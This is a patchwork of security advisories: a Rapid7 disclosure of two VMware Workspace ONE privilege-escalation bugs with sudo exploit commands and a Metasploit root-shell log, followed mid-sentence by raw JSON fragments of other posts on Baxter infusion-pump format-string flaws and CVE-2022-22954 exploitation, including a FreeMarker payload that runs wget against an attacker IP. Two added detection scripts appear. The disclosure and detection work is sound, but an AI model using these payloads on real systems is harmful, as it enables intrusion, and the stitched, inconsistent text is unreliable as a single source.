
The VMware Workspace ONE Access, Identity Manager, and vRealize Automation products contain a locally exploitable vulnerability whereby the under-privileged `horizon` user can escalate their permissions to those of the `root` user. Notably, the `horizon` user runs the externally accessible web application. This means that remote code execution (RCE) within that component could be chained with this vulnerability to obtain remote code execution as the root user. At the time of this writing, [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>) is one such RCE vulnerability (that notably has a corresponding [Metasploit module here](<https://github.com/rapid7/metasploit-framework/blob/62bfe03b50a22785b59a069319520531f2663b2b/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>)) that can be easily chained with one or both of the issues described herein.
## Product description
[VMware Workspace ONE Access](<https://www.vmware.com/products/workspace-one/access.html>) is a platform that provides organizations with the means to provide their employees fast and easy access to the applications they need. VMware Workspace ONE Access was formerly known as VMware Identity Manager.
## Impact
These vulnerabilities are local privilege escalation flaws, and by themselves, present little risk in an otherwise secure environment. In both cases, the local user must be `horizon` for successful exploitation.
That said, it’s important to note that the `horizon` user runs the externally accessible web application, which has seen several recent vulnerabilities — namely [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954>), which, when exploited, allows for remote code execution as the `horizon` user. Thus, chaining an exploit for CVE-2022-22954 with either of these vulnerabilities can allow a remote attacker to go from no access to root access in two steps.
## Credit
These issues were disclosed by VMware on Tuesday, August 2, 2022 within the [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) bulletin. In June, Spencer McIntyre of Rapid7 discovered these issues while researching an unrelated vulnerability. They were disclosed in accordance with [Rapid7’s vulnerability disclosure policy](<https://www.rapid7.com/security/disclosure/>).
## CVE-2022-31660
CVE-2022-31660 arises from the fact that the permissions on the file `/opt/vmware/certproxy/bin/cert-proxy.sh` are such that the `horizon` user both owns the file and is able to cause it to be invoked.
To demonstrate and exploit this vulnerability, that file is overwritten, and then the following command is executed as the `horizon` user:
```
sudo /usr/local/horizon/scripts/certproxyService.sh restart
```
Note that, depending on the patch level of the system, the `certproxyService.sh` script may be located at an alternative path and require a slightly different command:
```
sudo /opt/vmware/certproxy/bin/certproxyService.sh restart
```
In both cases, the horizon user is able to invoke the `certproxyService.sh` script from sudo without a password. This can be verified by executing `sudo -n --list`. The `certproxyService.sh` script invokes the `systemctl` command to restart the service based on its configuration file. The service configuration file, located at `/run/systemd/generator.late/vmware-certproxy.service`, dispatches to `/etc/rc.d/init.d/vmware-certproxy` through the `ExecStart` and `ExecStop` directives, which in turn executes `/opt/vmware/certproxy/bin/cert-proxy.sh`.
### Proof of concept
To demonstrate this vulnerability, a Metasploit module was written and submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>).
With an existing Meterpreter session, no options other than the SESSION need to be specified. Everything else will be automatically determined at runtime. In this scenario, the original Meterpreter session was obtained with the [module for CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/blob/6532365dc84c2052018456434363e4bfeca85ad4/modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb>), released earlier this year.
```
[*] Sending stage (40132 bytes) to 192.168.159.98
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.98:42312) at 2022-08-02 16:26:16 -0400

meterpreter > sysinfo
Computer        : photon-machine
OS              : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run

[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
[*] Sending stage (40132 bytes) to 192.168.250.237
[*] Meterpreter session 2 opened (192.168.250.134:4444 -> 192.168.250.237:63493) at 2022-08-02 16:26:57 -0400
[*] Restoring file contents...
[*] Restoring file permissions...

meterpreter > getuid
Server username: root
meterpreter >
```
## CVE-2022-31661
CVE-2022-31661 arises from the fact that the `/usr/local/horizon/scripts/getProtectedLogFiles.hzn` script can be run with root privileges without a password using the sudo command. This script in turn recursively changes the ownership of a user-supplied directory to the `horizon` user, effectively granting that user write permissions to all of its contents.
To demonstrate and exploit this vulnerability, we can execute the following command as the `horizon` user:
```
sudo /usr/local/horizon/scripts/getProtectedLogFiles.hzn exportProtectedLogs /usr/local/horizon/scripts/
```
At this point, the `horizon` user has write access (through ownership) to a variety of scripts that it is also permitted to invoke via sudo without a password. These scripts can be listed by executing `sudo -n --list`. A careful attacker would have backed up the ownership information for each file in the directory they intend to target and restored it once they had obtained root-level permissions.
The root cause of this vulnerability is that the `exportProtectedLogs` subcommand invokes the `getProtectedLogs` function that will change the ownership information to the `TOMCAT_USER`, which happens to be `horizon`.
Excerpt from `getProtectedLogFiles.hzn`:
```bash
function getProtectedLogs()
{
    chown ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION
    rm -f $TARGET_DIR_LOCATION/messages*
    rm -f $TARGET_DIR_LOCATION/boot*
    rm -rf $TARGET_DIR_LOCATION/journal*

    cp $VAR_LOG_MESSAGES* $TARGET_DIR_LOCATION
    cp $BOOT_LOG_MESSAGES* $TARGET_DIR_LOCATION
    chown -R ${TOMCAT_USER}:${TOMCAT_GROUP} $TARGET_DIR_LOCATION/
}
```
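The following audit helper is an added example (not Rapid7's module or VMware's code) covering both issues above: it parses `sudo -n --list` output and a table of file ownership, flags passwordless sudo commands whose script, or a script they are known to dispatch to, is writable by the `horizon` user (the CVE-2022-31660 pattern), and flags scripts under `/usr/local/horizon/scripts` that are no longer root-owned (the state the `chown -R` in the excerpt leaves behind, CVE-2022-31661). The sample `sudo -l` output and the ownership table are constructed, and the `DISPATCHES_TO` chain is the one named in this post.

```python
import re
import stat
from dataclasses import dataclass

# Dispatch chain described above: certproxyService.sh (either location) restarts
# the systemd unit, which ends up executing cert-proxy.sh.
DISPATCHES_TO = {
    "/usr/local/horizon/scripts/certproxyService.sh":
        ["/opt/vmware/certproxy/bin/cert-proxy.sh"],
    "/opt/vmware/certproxy/bin/certproxyService.sh":
        ["/opt/vmware/certproxy/bin/cert-proxy.sh"],
}


@dataclass(frozen=True)
class FileInfo:
    owner: str
    mode: int  # permission bits only, e.g. 0o755


@dataclass(frozen=True)
class SudoEntry:
    runas: str
    nopasswd: bool
    command: str


# Matches the per-command lines of `sudo -n --list`, e.g.
#     (root) NOPASSWD: /usr/local/horizon/scripts/certproxyService.sh
_SUDO_LINE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)")


def parse_sudo_list(text):
    """Extract (runas, NOPASSWD?, command) from `sudo -n --list` output."""
    entries = []
    for line in text.splitlines():
        m = _SUDO_LINE.match(line)
        if m:
            entries.append(SudoEntry(m.group("runas"),
                                     "NOPASSWD:" in m.group("tags"),
                                     m.group("cmd")))
    return entries


def writable_by(info, user):
    """The owner can always chmod and rewrite the file; anyone else needs o+w.
    Group membership is deliberately ignored to keep the example short."""
    return info.owner == user or bool(info.mode & stat.S_IWOTH)


def find_writable_sudo_targets(entries, files, user):
    """CVE-2022-31660 pattern: a passwordless sudo command, or a script it is
    known to dispatch to, is writable by the very user allowed to run it."""
    findings = []
    for e in entries:
        if not e.nopasswd:
            continue
        for path in [e.command] + DISPATCHES_TO.get(e.command, []):
            info = files.get(path)
            if info is not None and writable_by(info, user):
                findings.append((e.command, path))
    return findings


def find_non_root_scripts(files, directory):
    """Scripts under a sudo-invocable directory should stay root-owned."""
    prefix = directory.rstrip("/") + "/"
    return sorted(p for p, i in files.items()
                  if p.startswith(prefix) and i.owner != "root")


def simulate_recursive_chown(files, directory, owner):
    """Model `chown -R ${TOMCAT_USER}:... $TARGET_DIR_LOCATION/` on the table."""
    prefix = directory.rstrip("/") + "/"
    return {p: (FileInfo(owner, i.mode) if p.startswith(prefix) else i)
            for p, i in files.items()}


# Constructed sample of `sudo -n --list` output for the horizon user.
SAMPLE_SUDO_LIST = """\
User horizon may run the following commands on photon-machine:
    (root) NOPASSWD: /usr/local/horizon/scripts/certproxyService.sh
    (root) NOPASSWD: /usr/local/horizon/scripts/getProtectedLogFiles.hzn
    (root) /usr/bin/systemctl status vmware-certproxy
"""

# Constructed ownership table modelling an unpatched appliance.
SAMPLE_FILES = {
    "/usr/local/horizon/scripts/certproxyService.sh": FileInfo("root", 0o755),
    "/usr/local/horizon/scripts/getProtectedLogFiles.hzn": FileInfo("root", 0o755),
    "/opt/vmware/certproxy/bin/cert-proxy.sh": FileInfo("horizon", 0o755),
    "/usr/bin/systemctl": FileInfo("root", 0o755),
}


def audit(sudo_list_text=SAMPLE_SUDO_LIST, files=SAMPLE_FILES, user="horizon"):
    entries = parse_sudo_list(sudo_list_text)
    return {
        "writable_sudo_targets": find_writable_sudo_targets(entries, files, user),
        "non_root_scripts": find_non_root_scripts(files, "/usr/local/horizon/scripts"),
    }


if __name__ == "__main__":
    print("before:", audit())
    after = simulate_recursive_chown(SAMPLE_FILES, "/usr/local/horizon/scripts", "horizon")
    print("after chown -R:", audit(files=after))
```

On a live appliance, replace the constructed table with the result of `os.stat` and `pwd.getpwuid` over the paths that `parse_sudo_list` returns.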
## Remediation
Users should apply patches released in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) to remediate these vulnerabilities. If they are unable to, users should segment the appliance from remote access, especially if known issues in the web front end like CVE-2022-22954 also remain unpatched.
Note that fixing these vulnerabilities helps shore up internal, local defenses against attacks targeting external interfaces. For practical purposes, these issues are merely internal, local privilege escalation issues, so enterprises running VMware Workspace ONE Access installations with current patch levels should schedule updates addressing these issues as part of routine patch cycles.
## Rapid7 customers
InsightVM and Nexpose customers can assess their exposure to vulnerabilities described in [VMSA-2022-0021](<https://www.vmware.com/security/advisories/VMSA-2022-0021.html>) with authenticated, version-based coverage released on August 4, 2022 (ContentOnly-content-1.1.2606-202208041718).
## Disclosure timeline
* **May 20, 2022** - Issue discovered by Spencer McIntyre of Rapid7
* **June 28, 2022** - Rapid7 discloses the vulnerability to VMware
* **June 29, 2022** - VMware acknowledges receiving the details and begins an investigation
* **June 30, 2022** - VMware confirms that they have reproduced the issues, requests that Rapid7 not involve CERT for simplicity’s sake
* **July 1, 2022** - Rapid7 replies, agreeing to leave CERT out
* **July 22, 2022** - VMware states they will publish an advisory once the issues have been fixed, asks whom to credit
* **July 22, 2022** - Rapid7 responds confirming credit, inquires about a target date for a fix
* **August 2, 2022** - VMware discloses these vulnerabilities as part of VMSA-2022-0021 (without alerting Rapid7 of pending disclosure)
* **August 2, 2022** - Metasploit module submitted on GitHub in [PR #16854](<https://github.com/rapid7/metasploit-framework/pull/16854>)
* **August 5, 2022** - This disclosure blog
physical access by any unauthorized personnel to the infusion pumps or associated Wi-Fi battery units.\n\nIn addition, before de-acquisitioning the battery units, batteries should be plugged into a unit with invalid or blank Wi-Fi credentials configured and the unit powered up. This will overwrite the Wi-Fi credentials stored in the non-volatile memory of the batteries. Wi-Fi must be enabled on the infusion pump unit for this overwrite to work properly.\n\n## Format string vulnerabilities\n\n### \u201cHostmessage\u201d (CVE-2022-26392)\n\nWhen running a telnet session on the Baxter Sigma Wi-Fi Battery Firmware Version 16, the command \u201chostmessage\u201d is vulnerable to a format string vulnerability. \n\n**Exploitation**\n\nAn attacker could trigger this format string vulnerability by entering the following command during a telnet session:\n\n\n\nTo view the output of this format string vulnerability, _`set trace state=on`_ must be enabled in the telnet session. _`set trace`_ does not need to be enabled for the format string vulnerability to be triggered, but it does need to be enabled if the output of the vulnerability is to be viewed.\n\nOnce _`set trace`_ is enabled and showing output within the telnet session screen, the output of the vulnerability can be viewed, as shown below, where each _`%x`_ returned data from the device\u2019s process stack.\n\n\n\n### SSID (CVE-2022-26393)\n\nRapid7 also found another format string vulnerability on Wi-Fi battery software version 20 D29. This vulnerability is triggered within SSID processing by the _`get_wifi_location (20)`_ command being sent via XML to the Wi-Fi battery at TCP port 51243 or UDP port 51243.\n\n\n\n**Exploitation**\n\nThis format string vulnerability can be triggered by first setting up a Wi-Fi access point containing format string specifiers in the SSID. Next, an attacker could send a _`get_wifi_location (20)`_ command via TCP Port 51243 or UDP port 51243 to the infusion pump. 
This causes the device to process the SSID name of the access point nearby and trigger the exploit. The results of the triggering of format strings can be viewed with trace log output within a telnet session as shown below.\n\n\n\nThe SSID of _`AAAA%x%x%x%x%x%x%x%x%x%x%x%x%x%x`_ allows for control of 4 bytes on the stack, as shown above, using the _`%x`_ to walk the stack until it reaches 41414141. By changing the leading _`AAAA`_ in the SSID, a malicious actor could potentially use the format string injection to read and write arbitrary memory. At a minimum, using format strings of _`%s`_ and _`%n`_ could allow for a denial of service (DoS) by triggering an illegal memory read (_`%s`_) and/or illegal memory write (_`%n`_).\n\nNote that in order to trigger this DoS effect, the attacker would need to be within normal radio range and either be on the device's network or wait for an authorized _`get_wifi_location`_ command (the latter would itself be an unusual, non-default event).\n\n**Remediation**\n\nTo prevent exploitation, organizations should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to infusion pumps. In addition, be sure to monitor Wi-Fi space for rogue access points containing format string specifiers within the SSID name.\n\n## Unauthenticated network reconfiguration via TCP/UDP (CVE-2022-26394)\n\nAll Wi-Fi battery units tested (versions 16, 17, and 20 D29) allowed for remote unauthenticated changing of the SIGMA GW IP address. The SIGMA GW setting is used for configuring the back-end communication services for the device's operation.\n\n### Exploitation\n\nAn attacker could accomplish a remote redirect of SIGMA GW by sending an XML command 15 to TCP or UDP port 51243. During testing, only the SIGMA GW IP was found to be remotely changeable using this command. 
An example of this command and associated structure is shown below:\n\n\n\nThis could be used by a malicious actor to man-in-the-middle (MitM) all the communication initiated by the infusion pump. This could lead to information leakage and/or data being manipulated by a malicious actor.\n\n### Remediation\n\nOrganizations using SIGMA Spectrum products should restrict access to the network segments containing the infusion pumps. They should also monitor network traffic for any unauthorized host communicating over TCP and UDP port 51243 to the infusion pumps.\n\n## UART configuration access to Wi-Fi configuration data (additional finding)\n\nThe SIGMA Spectrum infusion pump unit transmits data unencrypted to the Wi-Fi battery unit via universal asynchronous receiver-transmitter (UART). During the power-up cycle of the infusion pump, the first block of data contains the Wi-Fi configuration data. This communication contains the SSID and 64-Character hex PSK.\n\n\n\n### Exploitation\n\nA malicious actor with **physical access** to an infusion pump can place a communication shim between the units (i.e., the pump and the Wi-Fi battery) and capture this data during the power-up cycle of the unit.\n\n\n\n### Remediation \n\n\nTo help prevent exploitation, organizations should restrict physical access by unauthorized persons to the infusion pumps and associated Wi-Fi battery units.\n\nNote that this is merely an additional finding based on physical, hands-on access to the device. While Baxter has addressed this finding through better decommissioning advice to end users, this particular issue does not rank for its own CVE identifier, as local encryption is beyond the scope of the hardware design of the device.\n\n## Disclosure timeline\n\nBaxter is an exemplary medical technology company with an obvious commitment to patient and hospital safety. 
While medtech vulnerabilities can be tricky and expensive to work through, we're quite pleased with the responsiveness, transparency, and genuine interest shown by Baxter's product security teams.\n\n * **April, 2022:** Issues discovered by [Deral Heiland](<https://twitter.com/Percent_X>) of Rapid7\n * **Wed, April 20, 2022:** Issues reported to [Baxter product security](<https://www.baxter.com/product-security#disclosure>)\n * **Wed, May 11, 2022:** Update requested from Baxter\n * **Wed, Jun 1, 2022:** Teleconference with Baxter and Rapid7 presenting findings\n * **Jun-Jul 2022:** Several follow up conversations and updates between Baxter and Rapid7\n * **Tue, Aug 2, 2022:** Coordination tracking over [VINCE](<https://www.kb.cert.org/vince/>) and more teleconferencing involving Baxter, Rapid7, CERT/CC, and [ICS-CERT](<https://www.cisa.gov/uscert/ics/advisories>) (VU#142423)\n * **Wed, Aug 31, 2022:** Final review of findings and mitigations\n * **Thu, Sep 8, 2022:** Baxter advisory [published](<https://www.baxter.com/product-security#additionalresources>)\n * **Thu, Sep 8, 2022:** Public disclosure of these issues\n * **Thu, Sep 8, 2022:** ICS-CERT [advisory published](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>)\n\n_**Additional reading:**_\n\n * _[Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software](<https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/>)_\n * _[CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>)_\n * _[QNAP Poisoned XML Command Injection (Silently 
Patched)](<https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/>)_\n * _[Primary Arms PII Disclosure via IDOR (FIXED)](<https://www.rapid7.com/blog/post/2022/08/02/primary-arms-pii-disclosure-via-idor/>)_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-08T16:30:00", "type": "rapid7blog", "title": "Baxter SIGMA Spectrum Infusion Pumps: Multiple Vulnerabilities (FIXED)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394", "CVE-2022-31660", "CVE-2022-31661"], "modified": "2022-09-08T16:30:00", "id": "RAPID7BLOG:4D69504143872C1DF22DEB73BA90A6BD", "href": "https://blog.rapid7.com/2022/09/08/baxter-sigma-spectrum-infusion-pumps-multiple-vulnerabilities-fixed/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-02T22:54:37", "description": "\n\nOn April 6, 2022, VMware published [VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>), which detailed multiple security vulnerabilities. The most severe of these is [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability affecting VMware\u2019s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. 
Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the application's service user (`horizon`).\n\nRapid7's vulnerability research team has a [full analysis of CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) in AttackerKB, including chaining the vulnerability with CVE-2022-22960 to escalate to `root`.\n\nAffected products:\n\n * VMware Workspace ONE Access (Access) 20.10.0.0 - 20.10.0.1, 21.08.0.0 - 21.08.0.1\n * VMware Identity Manager (vIDM) 3.3.3 - 3.3.6\n\nVMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer [indicated](<https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-cve-2022-22954-bug-patch-now/>) that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec [published analysis](<https://blog.morphisec.com/vmware-identity-manager-attack-backdoor>) of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and [fits in a tweet](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) (credit to researchers [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) and [Udhaya Prakash](<https://twitter.com/sherlocksecure>)).\n\nRapid7\u2019s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. 
A total of 14 requests were observed across ports 80, 98, 443, 4443.\n\n\n\nScanning/exploitation strings observed:\n\n * `/catalog-portal/ui/oauth/verify`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"cat /etc/hosts\")}`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - http://106[.]246[.]224[.]219/one\")}`\n\nAttacker IP addresses: \n`103[.]42[.]196[.]67` \n`5[.]157[.]38[.]50` \n`54[.]38[.]103[.]1` (NOTE: according to [this French government website](<https://cert.ssi.gouv.fr/scans/>), this IP address is benign) \n`94[.]74[.]123[.]228` \n`96[.]243[.]27[.]61` \n`107[.]174[.]218[.]172` \n`170[.]210[.]45[.]163` \n`173[.]212[.]229[.]216`\n\nThese nodes appear to be members of generic botnets. Rapid7\u2019s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as [Log4Shell](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>) exploitation attempts.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88099>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>). VMware has an FAQ available on this advisory [here](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0011-cve-2022-22954/>) for Unix-like systems. 
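For defenders who want to hunt for the request shapes quoted above in their own web server logs, the following Python is an added example (not code from this post, from Rapid7 or from VMware). It matches the `/catalog-portal/ui/oauth/verify` endpoint together with a `"freemarker.template.utility.Execute"?new()` payload in the `deviceUdid` parameter, percent-decodes the query repeatedly so double-encoded variants are not missed, extracts the injected command, and refangs the attacker IP list from the post into a lookup set (leaving out `54[.]38[.]103[.]1`, which the post notes CERT-FR reports as benign). The combined-log line format, the sample log lines and the `198.51.100.7` callback host are constructed for illustration and are assumptions, not observed data.

```python
"""Flag CVE-2022-22954 FreeMarker SSTI attempts in web access logs.

Added example for this post, not Rapid7 or VMware code.  It matches the
two request shapes quoted above (the /catalog-portal/ui/oauth/verify
endpoint and a "freemarker.template.utility.Execute"?new() payload in
the deviceUdid parameter), decodes percent-encoding before matching, and
refangs the bracketed attacker IPs from the post into a lookup set.  The
log format and the SAMPLE_LOG lines are constructed for illustration.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Attacker IPs as published (defanged).  54[.]38[.]103[.]1 is omitted
# because the post notes CERT-FR reports it as benign.
DEFANGED_IOCS = [
    "103[.]42[.]196[.]67", "5[.]157[.]38[.]50", "94[.]74[.]123[.]228",
    "96[.]243[.]27[.]61", "107[.]174[.]218[.]172", "170[.]210[.]45[.]163",
    "173[.]212[.]229[.]216",
]

VULN_PATH = "/catalog-portal/ui/oauth/verify"

# Combined-log-style line (assumed format): client IP, bracketed
# timestamp, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# FreeMarker ?new() on the Execute utility, applied to a quoted command.
# Runs against the percent-decoded query string.
SSTI_RE = re.compile(
    r'\$\{\s*"freemarker\.template\.utility\.Execute"\s*\?new\(\)\s*\(\s*"(?P<cmd>.*?)"\s*\)\s*\}',
    re.DOTALL,
)


def refang(ioc: str) -> str:
    """Turn a defanged address such as 1[.]2[.]3[.]4 back into 1.2.3.4."""
    return ioc.replace("[.]", ".")


IOC_IPS = frozenset(refang(i) for i in DEFANGED_IOCS)


def fully_decode(text: str, rounds: int = 3) -> str:
    """Percent-decode until stable so double-encoded payloads are seen."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect_request(ip: str, target: str) -> Optional[dict]:
    """Return a finding if the request carries the SSTI payload, else None."""
    path, _, query = target.partition("?")
    if not path.startswith(VULN_PATH):
        return None
    match = SSTI_RE.search(fully_decode(query))
    if not match:
        # Endpoint touched without a template payload: a bare probe, as
        # in the first string the post lists.  Not reported here.
        return None
    return {"ip": ip, "command": match.group("cmd"), "known_ioc": ip in IOC_IPS}


def scan_log(lines) -> list:
    """Run inspect_request over each parseable log line."""
    findings = []
    for line in lines:
        parsed = LOG_RE.match(line)
        if parsed is None:
            continue
        hit = inspect_request(parsed.group("ip"), parsed.group("target"))
        if hit is not None:
            findings.append(hit)
    return findings


# Constructed sample log.  Payloads are percent-encoded as a server
# would record them; 198.51.100.7 stands in for the real callback host.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Apr/2022:08:01:02 +0000] "GET /catalog-portal/ui/oauth/verify HTTP/1.1" 400 512',
    '103.42.196.67 - - [13/Apr/2022:08:01:09 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22cat%20/etc/hosts%22%29%7D HTTP/1.1" 400 512',
    '5.157.38.50 - - [22/Apr/2022:11:42:51 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7B%22freemarker.template.utility.Execute%22%3Fnew%28%29%28%22wget%20-U%20%22Hello%201.0%22%20-qO%20-%20http://198.51.100.7/one%22%29%7D HTTP/1.1" 400 512',
    # Double-encoded variant from an address not in the IOC list.
    '198.51.100.23 - - [22/Apr/2022:11:43:10 +0000] "GET /catalog-portal/ui/oauth/verify?error=&deviceUdid=%2524%257B%2522freemarker.template.utility.Execute%2522%253Fnew%2528%2529%2528%2522id%2522%2529%257D HTTP/1.1" 400 512',
    '192.0.2.9 - - [22/Apr/2022:11:50:00 +0000] "GET /SAAS/auth/login HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Point `scan_log` at the front-end access log of the appliance (the exact log format on a given deployment is an assumption here). Matching is done on the decoded query rather than the raw line, so encoded and double-encoded payloads are caught; a request that hits the endpoint without a template expression is deliberately not reported, because legitimate clients use that path too and the first string in the list above is exactly such a bare probe. Expect the hits to have non-2xx status codes: the template is evaluated while the server builds the error page, so the command runs even though the response is an error.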
(Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability. We recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>):\n\n * Suspicious Process - VMware Workspace ONE Access Launches Process\n\nFor our MDR service customers, Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary. The MDR team will notify you if suspicious activity is detected in your environment.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T13:25:42", "type": "rapid7blog", "title": "Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-29T13:25:42", "id": "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "href": "https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-06T19:31:54", "description": "## VMware Workspace ONE Access RCE\n\n\n\nCommunity contributor [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) has developed a new Metasploit Module which exploits [CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>), an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the \u2018horizon\u2019 user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official [Rapid7 Analysis](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>)\n\n## WSO2 Arbitrary File Upload to RCE\n\nOur very own [Jack Hysel](<https://github.com/jheysel-r7>) has contributed 